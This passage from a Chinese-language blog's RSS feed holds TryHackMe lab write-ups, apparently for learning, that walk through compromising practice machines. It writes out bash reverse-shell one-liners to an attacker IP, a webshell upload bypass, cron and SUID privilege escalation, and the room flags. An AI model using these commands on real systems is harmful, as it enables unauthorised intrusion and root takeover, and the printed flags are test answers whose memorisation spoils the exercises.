&lt;li&gt;沒有權限ftp 目錄- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/39cfa-uQql93e.png"&gt;&lt;/li&gt;
&lt;li&gt;有權限ㄌ!&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="shell"&gt;Shell&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;訪問 &lt;code&gt;http://10.10.37.216/files/ftp/b374k.php&lt;/code&gt;使用預設密碼轉用 Reverse Shell- 本地端準備 &lt;code&gt;nc -vlk 7877&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;在 Terminal 輸入 &lt;code&gt;bash -c 'bash -i &amp;gt;&amp;amp; /dev/tcp/10.14.7.198/7877 0&amp;gt;&amp;amp;1'&lt;/code&gt;切換為交互式 shell- &lt;code&gt;python -c 'import pty; pty.spawn(&amp;quot;/bin/bash&amp;quot;)'&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="亂逛系統"&gt;亂逛系統&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;根目錄底下&lt;code&gt;recipe.txt``Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was love.&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;問題 : What is the secret spicy soup recipe?&lt;/li&gt;
&lt;li&gt;答案 : &lt;code&gt;love&lt;/code&gt;incidents 資料夾- 裡面有 suspicious.pcapng&lt;/li&gt;
&lt;li&gt;透過 webshell 把他載下來備用使用者相關- &lt;code&gt;/home&lt;/code&gt; 底下有 &lt;code&gt;lennie&lt;/code&gt; 使用者&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="解析-pcap"&gt;解析 pcap&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;觀察第 45 個封包 follow TCP stream可以看到 webshell 的紀錄&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/6578a-QWan7Ig.png"&gt;&lt;/li&gt;
&lt;li&gt;其中輸入了密碼 &lt;code&gt;c4ntg3t3n0ughsp1c3&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="嘗試登入使用者"&gt;嘗試登入使用者&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;回到 reverse shell 輸入 &lt;code&gt;su lennie&lt;/code&gt; 並搭配上述密碼&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/1aaa3-VIqV6QA.png"&gt;&lt;/li&gt;
&lt;li&gt;登入成功!!取得 user.txt- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/3e0a9-GjOqlxS.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;THM{03ce3d619b80ccbfb3b7fc81e46c0e79}&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="研究提權"&gt;研究提權&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;在使用者資料夾裡找到 scripts 資料夾&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/4e9c7-eKvbNwQ.png"&gt;&lt;/li&gt;
&lt;li&gt;兩個檔案權限都是 root，但我們可以進行讀取&lt;/li&gt;
&lt;li&gt;&lt;code&gt;planner.sh&lt;/code&gt;看起來會把環境變數 $LIST 給寫到 startup_list.txt接著呼叫 &lt;code&gt;/etc/print.sh&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff79c6"&gt;#!/bin/bash
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8be9fd;font-style:italic"&gt;echo&lt;/span&gt; &lt;span style="color:#8be9fd;font-style:italic"&gt;$LIST&lt;/span&gt; &amp;gt; /home/lennie/scripts/startup_list.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;/etc/print.sh
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;觀察 &lt;code&gt;/etc/print.sh&lt;/code&gt; 可以發現我們有 write 的權限&lt;code&gt;-rwx------ 1 lennie lennie 25 Nov 12 2020 /etc/print.sh&lt;/code&gt;在 &lt;code&gt;print.sh&lt;/code&gt; 下面加上一行 reverse shell- &lt;code&gt;echo &amp;quot;bash -c 'bash -i &amp;gt;&amp;amp; /dev/tcp/10.14.7.198/8778 0&amp;gt;&amp;amp;1'&amp;quot; &amp;gt;&amp;gt; /etc/print.sh&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;當然這邊的 port 要跟目前的不同，然後本地開 &lt;code&gt;nc -vlk 8778&lt;/code&gt; 來聽&lt;/li&gt;
&lt;li&gt;然後連指令都還沒執行，就莫名地拿到 root ㄌ ?__?&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/a2a1b-6BoTO1i.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;THM{f963aaa6a430f210222158ae15c3d76d}&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="為什麼誤打誤撞拿到-root-ㄌ還是要來研究一下"&gt;為什麼誤打誤撞拿到 root ㄌ，還是要來研究一下&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;跑 Linpeas準備 &lt;code&gt;linpeas.sh&lt;/code&gt; 在本地&lt;code&gt;python3 -m http.server&lt;/code&gt;回到使用者端- &lt;code&gt;wget 10.14.7.198:8000/linpeas.sh&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;bash linpeas.sh | tee meow.txt&lt;/code&gt;看不出什麼結果使用 Pspy- 用上述同樣方法載到被駭機觀察&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/4364d-elNkToE.png"&gt;&lt;/li&gt;
&lt;li&gt;發現每分鐘都會用 UID=0 執行一次 &lt;code&gt;planner.sh&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;所以應該是一個 root 的 cron job進入root後- 輸入 &lt;code&gt;crontab -l&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/ed111-AEcjHhe.png"&gt;&lt;/li&gt;
&lt;li&gt;就能看到這條 cron job 了我還是覺得這一段有一點點通靈 QQ&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Root Me (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/07/24/root-me-try-hack-me-writeup/</link><pubDate>Sat, 24 Jul 2021 13:15:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/07/24/root-me-try-hack-me-writeup/</guid><description>&lt;p&gt;題目網址 : &lt;a href="https://tryhackme.com/room/rrootme"&gt;https://tryhackme.com/room/rrootme&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;目標IP : 10.10.233.205&lt;/p&gt;
&lt;h2 id="scanning"&gt;Scanning&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;起手式 nmap&lt;code&gt;nmap -A 10.10.233.205&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/86591-mLaLomQ.png"&gt;22 : SSH7.6p1 有枚舉的漏洞 CVE-2018-15473&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/sriramoffcl/OpenSSH-7.6p1-Exploit-py-/blob/master/45233.py80"&gt;https://github.com/sriramoffcl/OpenSSH-7.6p1-Exploit-py-/blob/master/45233.py80&lt;/a&gt; : Apache- Apache httpd 2.4.29nmap 掃描的同一時間，先打開網頁看看- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/7f376-NejdpQC.png"&gt;&lt;/li&gt;
&lt;li&gt;網頁起手式 dirsearch&lt;code&gt;python3 dirsearch.py -u http://10.10.233.205/ -e all&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;看起來可能會有趣的路徑&lt;code&gt;/panel/&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/uploads/&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="上傳-webshell"&gt;上傳 webshell&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;/panel/&lt;/code&gt; 可以上傳檔案&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d0c94-QOZqOa5.png"&gt;&lt;/li&gt;
&lt;li&gt;用 Wappalyzer 可以確定他是 PHP&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/808aa-awe80bs.png"&gt;上傳個 b374k.php- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/515ee-b6tqtn1.png"&gt;&lt;/li&gt;
&lt;li&gt;會噴錯，Google翻譯說 &lt;code&gt;PHP是不允許的！&lt;/code&gt; (葡萄牙文)使用 php 副檔名解析漏洞測試- Apache 1.x 2.x 文件解析特性BJ4測試檔名 &lt;code&gt;b374k.php.aaa&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/2ce91-ZIsfjUj.png"&gt;Google 翻譯 :&lt;code&gt;文件上傳成功！&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="使用-webshell"&gt;使用 Webshell&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;點下面的 &lt;code&gt;Veja!&lt;/code&gt; 會跳轉到 &lt;code&gt;http://10.10.233.205/uploads/b374k.php.aaa&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/94b34-QYfQaPb.png"&gt;&lt;/li&gt;
&lt;li&gt;使用預設密碼就能進入 shell&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="戳入-reverse-shell"&gt;戳入 Reverse Shell&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Webshell 滿好用的，但是Reverse shell用起來更爽確認攻擊機 ip 為 10.14.7.198終端機輸入 &lt;code&gt;nc -vlk 7877&lt;/code&gt;webshell 的 Terminal 輸入- &lt;code&gt;bash -c 'bash -i &amp;gt;&amp;amp; /dev/tcp/10.14.7.198/7877 0&amp;gt;&amp;amp;1'&lt;/code&gt;即可順利連上 Reverse shell- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/f3495-iKRzVfo.png"&gt;輸入指令讓他變得更 interactive 一點- &lt;code&gt;python -c 'import pty; pty.spawn(&amp;quot;/bin/bash&amp;quot;)'&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="在電腦裡面逛大街"&gt;在電腦裡面逛大街&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;user.txt&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/e6c32-jxS368J.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;THM{y0u_g0t_a_sh3ll&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="設法提權"&gt;設法提權&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;使用內建的上傳功能上傳 LinEnum.sh開權限 &lt;code&gt;chmod +x LinEnum.sh&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;執行，並存到檔案 &lt;code&gt;./LinEnum.sh | tee meow.txt&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;基本上優先注意紅色、橘色的東西&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/9786b-ikR24Co.png"&gt;找到有趣ㄉ東西!! &lt;code&gt;[+] Possibly interesting SUID files: -rwsr-sr-x 1 root root 3665768 Aug 4 2020 /usr/bin/python&lt;/code&gt;- 也就是說 &lt;code&gt;/usr/bin/python&lt;/code&gt; 可以用 SUID 執行&lt;/li&gt;
&lt;li&gt;到 &lt;a href="https://gtfobins.github.io/"&gt;GTFOBins&lt;/a&gt; 找 Python 有 SUID 的提權方法&lt;code&gt;python -c 'import os; os.execl(&amp;quot;/bin/sh&amp;quot;, &amp;quot;sh&amp;quot;, &amp;quot;-p&amp;quot;)'&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="提權成功"&gt;提權成功!!&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/78e38-jeFvVXw.png"&gt;&lt;/li&gt;
&lt;li&gt;Flag : &lt;code&gt;THM{pr1v1l3g3_3sc4l4t10n}&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item></channel></rss>